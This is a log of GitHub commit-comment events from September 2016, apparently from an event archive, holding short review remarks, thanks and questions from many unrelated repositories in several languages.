{"id":"4506698823","type":"CommitCommentEvent","actor":{"login":"linqingwudiv1"},"repo":{"name":"EverNewJoy/VictoryPlugin"},"payload":{"comment":{"id":18875322,"position":null,"line":null,"path":null,"commit_id":"162fee9cc90777b84936b6879d102d3ce1a275cd","created_at":"2016-09-02T05:46:24Z","updated_at":"2016-09-02T05:46:24Z","body":"Updated very quickly！！~\r\n\r\n"}},"created_at":"2016-09-02T05:46:24Z"}
{"id":"4506700424","type":"CommitCommentEvent","actor":{"login":"sjnam"},"repo":{"name":"sjnam/kotex-plain"},"payload":{"comment":{"id":18875323,"position":null,"line":null,"path":null,"commit_id":"5301021bc1cad3573d0f65057dbfd2f4d74d2464","created_at":"2016-09-02T05:47:06Z","updated_at":"2016-09-02T05:47:06Z","body":"- kotex-plain 패키지 안의 다른 파일 이름들과 일관성을 위해서 hangulcweb.tex 파일을 kotexcweb.tex으로 변경.\r\n- 영문 small caps에 해당하는 한글 글꼴을 기존의 나눔명조에서 나눔고딕 글꼴로 변경\r\n- \\kotitle 매크로 추가, 제목에 한글이 들어갈 경우, 이 제목이 페이지의 헤더(left/right header)의 한글 글꼴을 영문과 비슷하게 맞춤 "}},"created_at":"2016-09-02T05:47:06Z"}
{"id":"4506711626","type":"CommitCommentEvent","actor":{"login":"yanningzuo"},"repo":{"name":"yanningzuo/Image-Quantification"},"payload":{"comment":{"id":18875404,"position":null,"line":null,"path":null,"commit_id":"e17d30c757b1e227994a1b1d1e7f91e0c88e048f","created_at":"2016-09-02T05:51:43Z","updated_at":"2016-09-02T05:51:43Z","body":"For this task, all what you have to do is set a folder with your images to be quantified and drink some coffee. Within short time you can enjoy results sitting on the desktop for each image!"}},"created_at":"2016-09-02T05:51:43Z"}
{"id":"4506711635","type":"CommitCommentEvent","actor":{"login":"wilkinsona"},"repo":{"name":"philwebb/spring-boot"},"payload":{"comment":{"id":18875405,"position":39,"line":88,"path":"spring-boot-actuator/src/main/java/org/springframework/boot/actuate/autoconfigure/OnEnabledEndpointElementCondition.java","commit_id":"cdbcb7f932be1d5c443eadcf44745a8b007d8d2a","created_at":"2016-09-02T05:51:43Z","updated_at":"2016-09-02T05:51:43Z","body":"Typo"}},"created_at":"2016-09-02T05:51:43Z"}
{"id":"4506713264","type":"CommitCommentEvent","actor":{"login":"openhoat"},"repo":{"name":"openhoat/naught"},"payload":{"comment":{"id":18875440,"position":null,"line":null,"path":null,"commit_id":"df8e851e9f78980abde5273bf2bbeaa67b5dba4c","created_at":"2016-09-02T05:52:26Z","updated_at":"2016-09-02T05:52:26Z","body":"I had the same needs, so I just splitted lib/main.js in 2 files : one for the command line (bin/naught) and the other to export the api in a node module (lib/main.js)\r\nAnd I changed package.json to properly declare them.\r\nThis changes allow us to use naught in the 2 modes (cli and code)"}},"created_at":"2016-09-02T05:52:26Z"}
{"id":"4506714105","type":"CommitCommentEvent","actor":{"login":"amirreza7878"},"repo":{"name":"amirreza7878/amir"},"payload":{"comment":{"id":18875457,"position":5,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-02T05:52:46Z","updated_at":"2016-09-02T05:52:46Z","body":"787878"}},"created_at":"2016-09-02T05:52:46Z"}
{"id":"4506715384","type":"CommitCommentEvent","actor":{"login":"EverNewJoy"},"repo":{"name":"EverNewJoy/VictoryPlugin"},"payload":{"comment":{"id":18875475,"position":null,"line":null,"path":null,"commit_id":"162fee9cc90777b84936b6879d102d3ce1a275cd","created_at":"2016-09-02T05:53:19Z","updated_at":"2016-09-02T05:53:19Z","body":"You're welcome!\r\n\r\n♥\r\n\r\nRama"}},"created_at":"2016-09-02T05:53:19Z"}
{"id":"4506716483","type":"CommitCommentEvent","actor":{"login":"fxprunayre"},"repo":{"name":"geonetwork/core-geonetwork"},"payload":{"comment":{"id":18875480,"position":5,"line":50,"path":"web/src/main/webapp/xslt/common/error.xsl","commit_id":"682e02ce05602fc4a14fc07d6c0f6899156e0b74","created_at":"2016-09-02T05:53:48Z","updated_at":"2016-09-02T05:53:48Z","body":"> Are we sure that removing <script will be enough?\r\n\r\nDon't know, but only removing \"<\" or \">\" may break the real error message in some cases.\r\n\r\nIf the aim is to fix on the client side maybe https://docs.angularjs.org/api/ngSanitize/service/$sanitize (but that will not work for a no js interface) ?"}},"created_at":"2016-09-02T05:53:48Z"}
{"id":"4506717291","type":"CommitCommentEvent","actor":{"login":"dddaaaddd"},"repo":{"name":"dbfix/superflux-bot"},"payload":{"comment":{"id":18875482,"position":2,"line":2,"path":"plugins/groupcontrol.lua","commit_id":"b12525df218361f7e3731dad7965aa8944185a90","created_at":"2016-09-02T05:54:09Z","updated_at":"2016-09-02T05:54:09Z","body":"ی\r\n"}},"created_at":"2016-09-02T05:54:09Z"}
{"id":"4506718963","type":"CommitCommentEvent","actor":{"login":"LeeZee1"},"repo":{"name":"davidbmitchell/davidbmitchell.github.io"},"payload":{"comment":{"id":18875484,"position":null,"line":null,"path":null,"commit_id":"3704eb0823b3cea635e7dee2571da3e61103270e","created_at":"2016-09-02T05:54:50Z","updated_at":"2016-09-02T05:54:50Z","body":"When I execute the following commands in your tutorial to parse the \"games\", \"events\" and \"subs\" data, it executes, but I get an error: Here are the commands and following it is the error \r\n\r\n\r\n$ cd ~/Retrosheet/unparsed $ x=1950 y=2014 $ for (( i=$x; i<=$y; i++ )); do cwevent -f 0-96 -x 0-62 -y \"$i\" \"$i\".EV > ~/Retrosheet/parsed/all\"$i\".csv; done $ for (( i=$x; i<=$y; i++ )); do cwgame -f 0-83 -y \"$i\" \"$i\".EV > ~/Retrosheet/parsed/games\"$i\".csv; done $ for (( i=$x; i<=$y; i++ )); do cwsub -f 0-9 -y \"$i\" \"$i\".EV > ~/Retrosheet/parsed/sub\"$i\".csv; done {% endhighlight %}\r\n\r\nerror: \"Can't find teamfile (teamyear) for every season of data trying to parse\"\r\n\r\nDoes someone know how I can fix this?\r\n\r\nThanks,\r\nLee"}},"created_at":"2016-09-02T05:54:50Z"}
{"id":"4506720038","type":"CommitCommentEvent","actor":{"login":"wilkinsona"},"repo":{"name":"philwebb/spring-boot"},"payload":{"comment":{"id":18875487,"position":26,"line":70,"path":"spring-boot-autoconfigure/src/main/java/org/springframework/boot/autoconfigure/condition/ResourceCondition.java","commit_id":"cdbcb7f932be1d5c443eadcf44745a8b007d8d2a","created_at":"2016-09-02T05:55:16Z","updated_at":"2016-09-02T05:55:16Z","body":"Typo"}},"created_at":"2016-09-02T05:55:16Z"}
{"id":"4506726290","type":"CommitCommentEvent","actor":{"login":"prokhorenkovkv"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":18875502,"position":1,"line":1,"path":"src/main/java/com/softserverinc/edu/controllers/IssueCommentController.java","commit_id":"3e6b08a0d780859b9a4287da8eb6095bb69438bb","created_at":"2016-09-02T05:57:43Z","updated_at":"2016-09-02T05:57:43Z","body":"yeah. smth like"}},"created_at":"2016-09-02T05:57:43Z"}
{"id":"4506726835","type":"CommitCommentEvent","actor":{"login":"CoryJia"},"repo":{"name":"HaoNiuBi/LeetCodeQuestions"},"payload":{"comment":{"id":18875504,"position":null,"line":null,"path":null,"commit_id":"9d811ac0663514cf42bcd7ce09d39821db454b17","created_at":"2016-09-02T05:57:54Z","updated_at":"2016-09-02T05:57:54Z","body":"if first character of s is ')' , return false; "}},"created_at":"2016-09-02T05:57:54Z"}
{"id":"4506726915","type":"CommitCommentEvent","actor":{"login":"xmChen24"},"repo":{"name":"xmChen24/Leetcode"},"payload":{"comment":{"id":18875505,"position":null,"line":null,"path":null,"commit_id":"1e1113916d2321622e0286da08818174506562ab","created_at":"2016-09-02T05:57:56Z","updated_at":"2016-09-02T05:57:56Z","body":"asd"}},"created_at":"2016-09-02T05:57:56Z"}
{"id":"4506728715","type":"CommitCommentEvent","actor":{"login":"prokhorenkovkv"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":18875507,"position":55,"line":55,"path":"src/main/java/com/softserverinc/edu/controllers/IssueCommentController.java","commit_id":"3e6b08a0d780859b9a4287da8eb6095bb69438bb","created_at":"2016-09-02T05:58:35Z","updated_at":"2016-09-02T05:58:35Z","body":"got it. I'll fix it"}},"created_at":"2016-09-02T05:58:35Z"}
{"id":"4506732037","type":"CommitCommentEvent","actor":{"login":"swathi-ssunder"},"repo":{"name":"PokemonGoers/PokeData"},"payload":{"comment":{"id":18875515,"position":null,"line":null,"path":null,"commit_id":"893dc44a41c863e69b2c6c3bde5b4d455e23b4c3","created_at":"2016-09-02T05:59:46Z","updated_at":"2016-09-02T05:59:46Z","body":"@samitsv - What are the file name changes? "}},"created_at":"2016-09-02T05:59:46Z"}
{"id":"4506733648","type":"CommitCommentEvent","actor":{"login":"prokhorenkovkv"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":18875517,"position":37,"line":37,"path":"src/main/java/com/softserverinc/edu/controllers/IssueCommentController.java","commit_id":"3e6b08a0d780859b9a4287da8eb6095bb69438bb","created_at":"2016-09-02T06:00:17Z","updated_at":"2016-09-02T06:00:17Z","body":"you right"}},"created_at":"2016-09-02T06:00:17Z"}
{"id":"4506737225","type":"CommitCommentEvent","actor":{"login":"MichaelWallace30"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":18875563,"position":null,"line":null,"path":null,"commit_id":"216db72a9382782120701e1bf18ce1cf94f74b00","created_at":"2016-09-02T06:01:23Z","updated_at":"2016-09-02T06:01:23Z","body":"Lol thought you didn't tab for an end reason. Gonna tab all day."}},"created_at":"2016-09-02T06:01:23Z"}
{"id":"4506738611","type":"CommitCommentEvent","actor":{"login":"D-ECHO"},"repo":{"name":"Harald67/c150"},"payload":{"comment":{"id":18875575,"position":null,"line":null,"path":null,"commit_id":"e18a29e4f35bbe6d6fd87681c0b1bfc5317dc3a2","created_at":"2016-09-02T06:01:57Z","updated_at":"2016-09-02T06:01:57Z","body":"Add and correct markers (#53)"}},"created_at":"2016-09-02T06:01:57Z"}
{"id":"4506739154","type":"CommitCommentEvent","actor":{"login":"vendethiel"},"repo":{"name":"Phosphorus-M/ezarena"},"payload":{"comment":{"id":18875576,"position":null,"line":null,"path":null,"commit_id":"69c62cbe04b4337fc17339472800b5b2c0377622","created_at":"2016-09-02T06:02:09Z","updated_at":"2016-09-02T06:02:09Z","body":"Okay, I'll pull later then. Thanks!"}},"created_at":"2016-09-02T06:02:09Z"}
{"id":"4506744916","type":"CommitCommentEvent","actor":{"login":"kzidane"},"repo":{"name":"cs50/harvard.cs50.debug"},"payload":{"comment":{"id":18875580,"position":null,"line":null,"path":null,"commit_id":"f5dfdb881cf21f7c80853a67fcf0f2747cbd1223","created_at":"2016-09-02T06:04:21Z","updated_at":"2016-09-02T06:04:21Z","body":"@dmalan, actually this was Glenn's fix. Hyperlinked in #7 just to show that the bug was already fixed and that I recreated the bug deliberately to demo."}},"created_at":"2016-09-02T06:04:21Z"}
{"id":"4506745458","type":"CommitCommentEvent","actor":{"login":"vshekharjha"},"repo":{"name":"CreativeDream/jQuery.filer"},"payload":{"comment":{"id":18875585,"position":null,"line":null,"path":null,"commit_id":"c50df8f2a633a0eb8452fc3ea8c0d533b483aa71","created_at":"2016-09-02T06:04:33Z","updated_at":"2016-09-02T06:04:33Z","body":"You have to call this valid function on input file change and it will create the list of file when ever onChange is called\r\n\r\n` <input type=\"file\" name=\"files[]\" onChange=\"validFile(this,event)\" id=\"filer_input2\" multiple>`"}},"created_at":"2016-09-02T06:04:33Z"}
{"id":"4506750713","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":18875598,"position":null,"line":null,"path":null,"commit_id":"216db72a9382782120701e1bf18ce1cf94f74b00","created_at":"2016-09-02T06:06:36Z","updated_at":"2016-09-02T06:06:36Z","body":"Put it on my tab, bartender."}},"created_at":"2016-09-02T06:06:36Z"}
{"id":"4506751368","type":"CommitCommentEvent","actor":{"login":"ohliumliu"},"repo":{"name":"ohliumliu/gsl-playground"},"payload":{"comment":{"id":18875600,"position":null,"line":null,"path":null,"commit_id":"2fd2efe5bc1726ab40716de41edb6ef895f32670","created_at":"2016-09-02T06:06:49Z","updated_at":"2016-09-02T06:06:49Z","body":"see a8bd509b3f109dd168587d390bf02673bfd543c3 for a similar treatment for gsl_complex_cos"}},"created_at":"2016-09-02T06:06:49Z"}
{"id":"4506753310","type":"CommitCommentEvent","actor":{"login":"rakshans1"},"repo":{"name":"rakshans1/docstash"},"payload":{"comment":{"id":18875603,"position":null,"line":null,"path":null,"commit_id":"ed876a5f5d56fb6cfaa63d9501670a5009b1c70a","created_at":"2016-09-02T06:07:32Z","updated_at":"2016-09-02T06:07:32Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;jKqhRG76&#x2F;128-dropzone\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Dropzone</a>"}},"created_at":"2016-09-02T06:07:32Z"}
{"id":"4506754652","type":"CommitCommentEvent","actor":{"login":"Fr3ddy7"},"repo":{"name":"modxcms/evolution"},"payload":{"comment":{"id":18875609,"position":null,"line":null,"path":null,"commit_id":"1ee53dfb9ddf30934893d1d122ee966afced683c","created_at":"2016-09-02T06:08:02Z","updated_at":"2016-09-02T06:08:02Z","body":"It has become much easier, but gone sorting of documents within a folder. That is now possible to sort only the first level (drag and drop), and disappeared inside the sorting folders :("}},"created_at":"2016-09-02T06:08:02Z"}
{"id":"4506757101","type":"CommitCommentEvent","actor":{"login":"kreativitea"},"repo":{"name":"ElizabethLane/HB_Project"},"payload":{"comment":{"id":18875613,"position":null,"line":null,"path":null,"commit_id":"e2dedbbf90c69d6d4e392dd3d2b1b0ecf842ba67","created_at":"2016-09-02T06:08:56Z","updated_at":"2016-09-02T06:08:56Z","body":"Hey Liz!  \r\n\r\nI noticed you committed a .DS_Store file!  This is a mac specific operating system file that probably shouldn't be committed to your repository. :)  \r\n\r\nThis kind of stuff is typically avoided by production software engineers by the presence of a `.gitignore` file.   You can find some templates for `.gitignore` files from [github/gitignore](https://github.com/github/gitignore).\r\n\r\nYou should stitch together a git ignore using the technologies that you're using.  In your case, you probably need `gitignore/python.gitignore`, `gitignore/global/macOS.gitignore`, and `gitignore/global/SublimeText.gitignore`.  \r\n\r\nLet me know if you have any questions!"}},"created_at":"2016-09-02T06:08:56Z"}
{"id":"4506757559","type":"CommitCommentEvent","actor":{"login":"IldarMin"},"repo":{"name":"IldarMin/PalindromeExample"},"payload":{"comment":{"id":18875615,"position":null,"line":null,"path":null,"commit_id":"544d4e389f19b05ae2d346370be2857126503611","created_at":"2016-09-02T06:09:08Z","updated_at":"2016-09-02T06:09:08Z","body":"Хорошо)) Приму к сведению))\r\nа то что не известно, это у меня на домашнем ключи баганулись)))"}},"created_at":"2016-09-02T06:09:08Z"}
{"id":"4506758726","type":"CommitCommentEvent","actor":{"login":"meshula"},"repo":{"name":"PixarAnimationStudios/USD"},"payload":{"comment":{"id":18875617,"position":8,"line":47,"path":"README.md","commit_id":"ee43e6e434b68ee02b6e0de98db8681b2fc61367","created_at":"2016-09-02T06:09:36Z","updated_at":"2016-09-02T06:09:36Z","body":"We now know that OSX requires 1.61.0 as well, due to the type traits breakages vs. boost python and clang."}},"created_at":"2016-09-02T06:09:36Z"}
{"id":"4506759432","type":"CommitCommentEvent","actor":{"login":"IldarMin"},"repo":{"name":"IldarMin/PalindromeExample"},"payload":{"comment":{"id":18875622,"position":22,"line":22,"path":"index.html","commit_id":"544d4e389f19b05ae2d346370be2857126503611","created_at":"2016-09-02T06:09:53Z","updated_at":"2016-09-02T06:09:53Z","body":"это просто, в 10 часов вечера пришла задача))) и быстро написал)))"}},"created_at":"2016-09-02T06:09:53Z"}
{"id":"4506762768","type":"CommitCommentEvent","actor":{"login":"IldarMin"},"repo":{"name":"IldarMin/PalindromeExample"},"payload":{"comment":{"id":18875630,"position":11,"line":11,"path":"index.html","commit_id":"544d4e389f19b05ae2d346370be2857126503611","created_at":"2016-09-02T06:11:07Z","updated_at":"2016-09-02T06:11:07Z","body":"этот вариант компактный и очень функционален) сегодня сделаю так))"}},"created_at":"2016-09-02T06:11:07Z"}
{"id":"4506763338","type":"CommitCommentEvent","actor":{"login":"k24dizzle"},"repo":{"name":"michaelcao311/liblod"},"payload":{"comment":{"id":18875632,"position":13,"line":22,"path":"server/server.js","commit_id":"4344443772ed9622437768983906a2ea48f12e94","created_at":"2016-09-02T06:11:20Z","updated_at":"2016-09-02T06:11:20Z","body":"idk how to send this info so for now..."}},"created_at":"2016-09-02T06:11:20Z"}
{"id":"4506766000","type":"CommitCommentEvent","actor":{"login":"kreativitea"},"repo":{"name":"ElizabethLane/HB_Project"},"payload":{"comment":{"id":18875639,"position":null,"line":null,"path":null,"commit_id":"e9641cf9bad96756bbcff8d394bf8cf816c16d19","created_at":"2016-09-02T06:12:16Z","updated_at":"2016-09-02T06:12:16Z","body":"In production code, most people consider it good practice to commit library files (such as jquery.js in this case) in a separate commit.  Doing this allows for a reviewer to more easily figure out which files have code in them that was actually written by the programmer!"}},"created_at":"2016-09-02T06:12:16Z"}
{"id":"4506768570","type":"CommitCommentEvent","actor":{"login":"Floessie"},"repo":{"name":"Beep6581/RawTherapee"},"payload":{"comment":{"id":18875642,"position":4,"line":33,"path":"rtengine/color.h","commit_id":"d31de41f68cfcb9c3f5043987fdba0d882eed550","created_at":"2016-09-02T06:13:16Z","updated_at":"2016-09-02T06:13:16Z","body":"@Hombre57 Great, you converted that to `std::array<>`. It's just that one of its benefits - the direct visibility of its size - is gone, if you hide it behind a `typedef`. ;)"}},"created_at":"2016-09-02T06:13:16Z"}
{"id":"4506769027","type":"CommitCommentEvent","actor":{"login":"soitanen"},"repo":{"name":"legoboyvdlp/737-800"},"payload":{"comment":{"id":18875643,"position":null,"line":null,"path":null,"commit_id":"7d122a1d8310907f3bdc1a1a349403fe1022d806","created_at":"2016-09-02T06:13:28Z","updated_at":"2016-09-02T06:13:28Z","body":"this setting do not affects on thrust or something else, but affects on spool-up time for engine. And at real setting spool-up time is too big. So be carefull with setting this value."}},"created_at":"2016-09-02T06:13:28Z"}
{"id":"4506771664","type":"CommitCommentEvent","actor":{"login":"svelankar"},"repo":{"name":"svelankar/SpringInAction"},"payload":{"comment":{"id":18875651,"position":null,"line":null,"path":null,"commit_id":"ca195cb65a3a6d30ef7f60191b16f776c379750a","created_at":"2016-09-02T06:14:29Z","updated_at":"2016-09-02T06:14:29Z","body":"Merge"}},"created_at":"2016-09-02T06:14:29Z"}
{"id":"4506772048","type":"CommitCommentEvent","actor":{"login":"svelankar"},"repo":{"name":"svelankar/SpringInAction"},"payload":{"comment":{"id":18875653,"position":null,"line":null,"path":null,"commit_id":"ca195cb65a3a6d30ef7f60191b16f776c379750a","created_at":"2016-09-02T06:14:39Z","updated_at":"2016-09-02T06:14:39Z","body":"Merge"}},"created_at":"2016-09-02T06:14:39Z"}
{"id":"4506774430","type":"CommitCommentEvent","actor":{"login":"obidniakv"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":18875660,"position":9,"line":53,"path":"src/main/java/com/softserverinc/edu/services/IssueService.java","commit_id":"8f2412fcdb3726bf9561f7632d8d35d6feb0003d","created_at":"2016-09-02T06:15:31Z","updated_at":"2016-09-02T06:15:31Z","body":"ok"}},"created_at":"2016-09-02T06:15:31Z"}
{"id":"4506775888","type":"CommitCommentEvent","actor":{"login":"tripu"},"repo":{"name":"w3c/i18n-checker"},"payload":{"comment":{"id":18875663,"position":null,"line":null,"path":null,"commit_id":"6ba79ef40b545e3391fb6ac7d1aa970ef4cbf424","created_at":"2016-09-02T06:16:06Z","updated_at":"2016-09-02T06:16:06Z","body":"It's better to avoid committing alone to `master`, IMHO.\r\n\r\nPacking several commits like this one into a single &ldquo;Miscellanea&rdquo; or &ldquo;Fixes&rdquo; PR, and submitting that for review, adds very little overhead and ensures peer review. [Example](https://github.com/w3c/echidna/pull/312).\r\n\r\n> *&ldquo;Proposals for changes to the checker must be submitted via pull requests, and will need to be reviewed by someone other than the proposer before merging with the master branch.&rdquo;*"}},"created_at":"2016-09-02T06:16:06Z"}
{"id":"4506775948","type":"CommitCommentEvent","actor":{"login":"sunilgulabani"},"repo":{"name":"PaoloL/aws-apigateway"},"payload":{"comment":{"id":18875664,"position":null,"line":null,"path":null,"commit_id":"e7175b77ead5c12045629559c8eefcfcc6bfdb6d","created_at":"2016-09-02T06:16:08Z","updated_at":"2016-09-02T06:16:08Z","body":"Hey @PaoloL , Thanks for sharing the great article. Do you have Cloud Formation script for this tutorial?"}},"created_at":"2016-09-02T06:16:08Z"}
{"id":"4506780594","type":"CommitCommentEvent","actor":{"login":"e-cloud"},"repo":{"name":"ELLIOTTCABLE/node-inspector"},"payload":{"comment":{"id":18875668,"position":null,"line":null,"path":null,"commit_id":"ae8197dec9863d5caf157ecace88f4957e4a33f4","created_at":"2016-09-02T06:17:54Z","updated_at":"2016-09-02T06:17:54Z","body":"this fix make sense 👍 "}},"created_at":"2016-09-02T06:17:54Z"}
{"id":"4506782149","type":"CommitCommentEvent","actor":{"login":"newsh"},"repo":{"name":"newsh/pokeGram"},"payload":{"comment":{"id":18875672,"position":null,"line":null,"path":null,"commit_id":"6d7a625ac08a73eb2150bf9ad9be0d6fbb8415b9","created_at":"2016-09-02T06:18:25Z","updated_at":"2016-09-02T06:18:25Z","body":"The single .sql file can be found [here](https://github.com/newsh/pokeGram/blob/master/src/pokeGram_dump_310816.sql).  \r\nI will update the link to it found in Instructions, thanks for letting me know."}},"created_at":"2016-09-02T06:18:25Z"}
{"id":"4506782788","type":"CommitCommentEvent","actor":{"login":"ItsCEED"},"repo":{"name":"nikos90/Worldopole"},"payload":{"comment":{"id":18875675,"position":null,"line":null,"path":null,"commit_id":"71a0031a7f908556535f5f79d4889ffabd04b511","created_at":"2016-09-02T06:18:39Z","updated_at":"2016-09-02T06:18:39Z","body":"Uh nice one"}},"created_at":"2016-09-02T06:18:39Z"}
{"id":"4506784991","type":"CommitCommentEvent","actor":{"login":"Deesen"},"repo":{"name":"modxcms/evolution"},"payload":{"comment":{"id":18875677,"position":null,"line":null,"path":null,"commit_id":"1ee53dfb9ddf30934893d1d122ee966afced683c","created_at":"2016-09-02T06:19:27Z","updated_at":"2016-09-02T06:19:27Z","body":"You mean, Right-Click -> Sort menuindex, doesn´t work for you?\r\n\r\n![sortmenu](https://cloud.githubusercontent.com/assets/8569221/18194437/de05e9bc-70e5-11e6-842f-9aaa3b6504e6.png)\r\n"}},"created_at":"2016-09-02T06:19:27Z"}
{"id":"4506785821","type":"CommitCommentEvent","actor":{"login":"4U6U57"},"repo":{"name":"leonardc415/Lightning"},"payload":{"comment":{"id":18875678,"position":1,"line":1,"path":"Lightning.pde","commit_id":"0cf3dd60891fa3672acc533fa146d5f8341cf405","created_at":"2016-09-02T06:19:43Z","updated_at":"2016-09-02T06:19:43Z","body":"; don't forget"}},"created_at":"2016-09-02T06:19:43Z"}
{"id":"4506787830","type":"CommitCommentEvent","actor":{"login":"mwperina"},"repo":{"name":"machacekondra/ansible"},"payload":{"comment":{"id":18875680,"position":33,"line":33,"path":"lib/ansible/module_utils/ovirt.py","commit_id":"90b97cf4dbf59eab84abd673078ef1f3b0fbae81","created_at":"2016-09-02T06:20:28Z","updated_at":"2016-09-02T06:20:28Z","body":"You could spare 2 lines:\r\n'''\r\n HAS_SDK = LooseVersion(sdk_version.VERSION) >= LooseVersion('4.0.0')\r\n'''"}},"created_at":"2016-09-02T06:20:28Z"}
{"id":"4506789711","type":"CommitCommentEvent","actor":{"login":"mlspinylobster"},"repo":{"name":"keigori/marubatugame"},"payload":{"comment":{"id":18875686,"position":12,"line":10,"path":"Check_out.rb","commit_id":"ec001e00eb0c6086d9b59df797bdc0c0bb2803bd","created_at":"2016-09-02T06:21:09Z","updated_at":"2016-09-02T06:21:09Z","body":"このループは必要ですか？\r\n全ての行に対して処理を行ってるけど、指定された行だけチェックすればいいと思います。"}},"created_at":"2016-09-02T06:21:09Z"}
{"id":"4506789718","type":"CommitCommentEvent","actor":{"login":"MrNiuEight"},"repo":{"name":"MrNiuEight/gitStills"},"payload":{"comment":{"id":18875687,"position":null,"line":null,"path":null,"commit_id":"5d0ff1223bb0c6232c5b3c9ab4156c249d4ecfbc","created_at":"2016-09-02T06:21:10Z","updated_at":"2016-09-02T06:21:10Z","body":"123123"}},"created_at":"2016-09-02T06:21:10Z"}
{"id":"4506790897","type":"CommitCommentEvent","actor":{"login":"aulence"},"repo":{"name":"aulence/webSyllabus"},"payload":{"comment":{"id":18875688,"position":null,"line":null,"path":null,"commit_id":"e171a495552d46d262345136c8d260855d5e8714","created_at":"2016-09-02T06:21:34Z","updated_at":"2016-09-02T06:21:34Z","body":"想找回来"}},"created_at":"2016-09-02T06:21:34Z"}
{"id":"4506791006","type":"CommitCommentEvent","actor":{"login":"4U6U57"},"repo":{"name":"leonardc415/Lightning"},"payload":{"comment":{"id":18875689,"position":27,"line":24,"path":"Lightning.pde","commit_id":"0cf3dd60891fa3672acc533fa146d5f8341cf405","created_at":"2016-09-02T06:21:36Z","updated_at":"2016-09-02T06:21:36Z","body":"Not that this really matters, but the README says to do this after setting endX and endY."}},"created_at":"2016-09-02T06:21:36Z"}
{"id":"4506793257","type":"CommitCommentEvent","actor":{"login":"aulence"},"repo":{"name":"aulence/webSyllabus"},"payload":{"comment":{"id":18875692,"position":null,"line":null,"path":null,"commit_id":"530dec3298164a06d540163ab3a333bc57c047c7","created_at":"2016-09-02T06:22:25Z","updated_at":"2016-09-02T06:22:25Z","body":"继续回退"}},"created_at":"2016-09-02T06:22:25Z"}
{"id":"4506793445","type":"CommitCommentEvent","actor":{"login":"mwperina"},"repo":{"name":"machacekondra/ansible"},"payload":{"comment":{"id":18875694,"position":53,"line":53,"path":"lib/ansible/utils/module_docs_fragments/ovirt.py","commit_id":"90b97cf4dbf59eab84abd673078ef1f3b0fbae81","created_at":"2016-09-02T06:22:29Z","updated_at":"2016-09-02T06:22:29Z","body":"Shouldn't be there '''python-ovirt-engine-sdk4 >= 4.0.0''' ?"}},"created_at":"2016-09-02T06:22:29Z"}
{"id":"4506796717","type":"CommitCommentEvent","actor":{"login":"LycanN"},"repo":{"name":"LycanN/-1"},"payload":{"comment":{"id":18875700,"position":7,"line":7,"path":".gitignore","commit_id":"a43983af85dd7bc07e38179122b506f10e847dbd","created_at":"2016-09-02T06:23:41Z","updated_at":"2016-09-02T06:23:41Z","body":"scanf(\"asdajl\")"}},"created_at":"2016-09-02T06:23:41Z"}
{"id":"4506799115","type":"CommitCommentEvent","actor":{"login":"mwperina"},"repo":{"name":"machacekondra/ansible-modules-extras"},"payload":{"comment":{"id":18875701,"position":22,"line":22,"path":"cloud/ovirt/ovirt_auth.py","commit_id":"9441ba41d8e9ec8683928209a270de64ef4e7349","created_at":"2016-09-02T06:24:31Z","updated_at":"2016-09-02T06:24:31Z","body":"We don't need HAS_SDK variable as the is performed in utility module, right?"}},"created_at":"2016-09-02T06:24:31Z"}
{"id":"4506799461","type":"CommitCommentEvent","actor":{"login":"mwperina"},"repo":{"name":"machacekondra/ansible-modules-extras"},"payload":{"comment":{"id":18875702,"position":24,"line":24,"path":"cloud/ovirt/ovirt_auth.py","commit_id":"9441ba41d8e9ec8683928209a270de64ef4e7349","created_at":"2016-09-02T06:24:39Z","updated_at":"2016-09-02T06:24:39Z","body":"Same as above"}},"created_at":"2016-09-02T06:24:39Z"}
{"id":"4506804924","type":"CommitCommentEvent","actor":{"login":"trvrb"},"repo":{"name":"blab/blotter"},"payload":{"comment":{"id":18875720,"position":null,"line":null,"path":null,"commit_id":"6aa07da3231713dec973ead43cdb4e20426eda70","created_at":"2016-09-02T06:26:39Z","updated_at":"2016-09-02T06:26:39Z","body":"I'd suggest finding your favorite picture of a salmon to include as an inline image, like: https://github.com/blab/blotter/blob/master/images/blog/zibra_logo.png. Or whatever you'd prefer really. If you add this to the repo under `images/blog/`, I'll size it appropriately."}},"created_at":"2016-09-02T06:26:39Z"}
{"id":"4506805141","type":"CommitCommentEvent","actor":{"login":"mlspinylobster"},"repo":{"name":"keigori/marubatugame"},"payload":{"comment":{"id":18875721,"position":7,"line":4,"path":"Check_out.rb","commit_id":"ec001e00eb0c6086d9b59df797bdc0c0bb2803bd","created_at":"2016-09-02T06:26:43Z","updated_at":"2016-09-02T06:26:43Z","body":"このbanmenの前にあるアスタリスクやメソッド呼び出し時のアスタリスクは何のためにつけていますか？"}},"created_at":"2016-09-02T06:26:43Z"}
{"id":"4506812015","type":"CommitCommentEvent","actor":{"login":"stringWang"},"repo":{"name":"stringWang/SwipeBackExample-master"},"payload":{"comment":{"id":18875741,"position":null,"line":null,"path":null,"commit_id":"b67ac61bee825a33295f78acd5e244c5a10ca8a3","created_at":"2016-09-02T06:28:56Z","updated_at":"2016-09-02T06:28:56Z","body":"自述文件"}},"created_at":"2016-09-02T06:28:56Z"}
{"id":"4506813888","type":"CommitCommentEvent","actor":{"login":"mwperina"},"repo":{"name":"machacekondra/ansible-modules-extras"},"payload":{"comment":{"id":18875748,"position":24,"line":24,"path":"cloud/ovirt/ovirt_vms.py","commit_id":"71992919e69397527f7feaebc384d263bb8e61da","created_at":"2016-09-02T06:29:35Z","updated_at":"2016-09-02T06:29:35Z","body":"We don't need HAS_SDK variable as the is performed in utility module, right?"}},"created_at":"2016-09-02T06:29:35Z"}
